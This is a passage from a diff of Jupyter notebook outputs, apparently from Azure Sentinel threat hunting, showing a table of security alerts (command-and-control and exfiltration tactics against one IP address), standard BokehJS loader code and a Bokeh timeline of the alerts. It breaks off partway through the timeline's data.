+       "                 EndTimeUtc         ProcessingEndTime RemediationSteps  \\\n",
+       "0 2020-12-19 19:04:59+00:00 2020-12-19 19:10:17+00:00                    \n",
+       "1 2021-01-15 09:27:50+00:00 2021-01-15 09:32:56+00:00                    \n",
+       "2 2021-01-15 10:27:50+00:00 2021-01-15 10:32:56+00:00                    \n",
+       "3 2021-01-15 11:04:21+00:00 2021-01-15 11:09:27+00:00                    \n",
+       "4 2021-01-15 09:04:21+00:00 2021-01-15 09:09:27+00:00                    \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "1  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "2  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "3  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "4  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0         [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "1    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    SOC   \n",
+       "2    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    SOC   \n",
+       "3    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "4    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "\n",
+       "  ExtendedLinks     ProductName ProductComponentName AlertLink Status  \\\n",
+       "0                Azure Sentinel     Scheduled Alerts              New   \n",
+       "1                Azure Sentinel     Scheduled Alerts              New   \n",
+       "2                Azure Sentinel     Scheduled Alerts              New   \n",
+       "3                Azure Sentinel     Scheduled Alerts              New   \n",
+       "4                Azure Sentinel     Scheduled Alerts              New   \n",
+       "\n",
+       "  CompromisedEntity            Tactics           Type  \\\n",
+       "0                    CommandAndControl  SecurityAlert   \n",
+       "1                         Exfiltration  SecurityAlert   \n",
+       "2                         Exfiltration  SecurityAlert   \n",
+       "3                         Exfiltration  SecurityAlert   \n",
+       "4                         Exfiltration  SecurityAlert   \n",
+       "\n",
+       "                         SystemAlertId1  \\\n",
+       "0  fdc54c12-efba-38b0-8379-f06d7fbfd34a   \n",
+       "1  06c1a670-447a-5032-87d9-dadcc38c7f54   \n",
+       "2  8855a515-5f75-1917-e001-ab7c56fbe7b1   \n",
+       "3  4acbd9b6-77b9-6918-bae4-52dcc703e646   \n",
+       "4  63d01128-c146-3470-c8d3-dc2e1258c6ab   \n",
+       "\n",
+       "                                                                                   ExtendedProperties1  \\\n",
+       "0  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "1  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "2  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "3  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "4  {\\r\\n  \"Query\": \"// The query_now parameter (in UTC format) was prepended to the query to reflec...   \n",
+       "\n",
+       "                                                                                             Entities1  \\\n",
+       "0         [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  }\\r\\n]   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"3.88.48.125\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  {\\...   \n",
+       "\n",
+       "     MatchingIps  \n",
+       "0  [3.88.48.125]  \n",
+       "1  [3.88.48.125]  \n",
+       "2  [3.88.48.125]  \n",
+       "3  [3.88.48.125]  \n",
+       "4  [3.88.48.125]  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1001\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1001\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"9c3815e8-e651-4c62-b575-428caed055ec\" data-root-id=\"1072\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"1fff9a48-6d80-4c53-ab13-9e3c590b6a98\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1004\"},{\"id\":\"1036\"}]},\"id\":\"1072\",\"type\":\"Column\"},{\"attributes\":{\"end\":1613972756712.4,\"start\":1607027392863.6},\"id\":\"1039\",\"type\":\"Range1d\"},{\"attributes\":{\"below\":[{\"id\":\"1047\"},{\"id\":\"1052\"}],\"center\":[{\"id\":\"1050\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1058\"}],\"title\":{\"id\":\"1037\"},\"toolbar\":{\"id\":\"1051\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1039\"},\"x_scale\":{\"id\":\"1043\"},\"y_range\":{\"id\":\"1041\"},\"y_scale\":{\"id\":\"1045\"}},\"id\":\"1036\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1069\",\"type\":\"Diamond\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1084\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1096\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1092\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1106\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1068\",\"type\":\"Diamond\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1082\"},{\"id\":\"1083\"},{\"id\":\"1084\"},{\"id\":\"1085\"},{\"id\":\"1086\"},{\"id\":\"1087\"},{\"id\":\"1088\"},{\"id\":\"1089\"},{\"id\":\"1090\"},{\"id\":\"1091\"},{\"id\":\"1092\"},{\"id\":\"1093\"}]},\"id\":\"1016\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1093\",\"type\":\"YearsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"}],\"left\":[{\"id\":\"1019\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1070\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1029\"},\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1098\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1105\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1043\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"AlertName\":[\"Possible contact with a domain generated by a DGA\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly 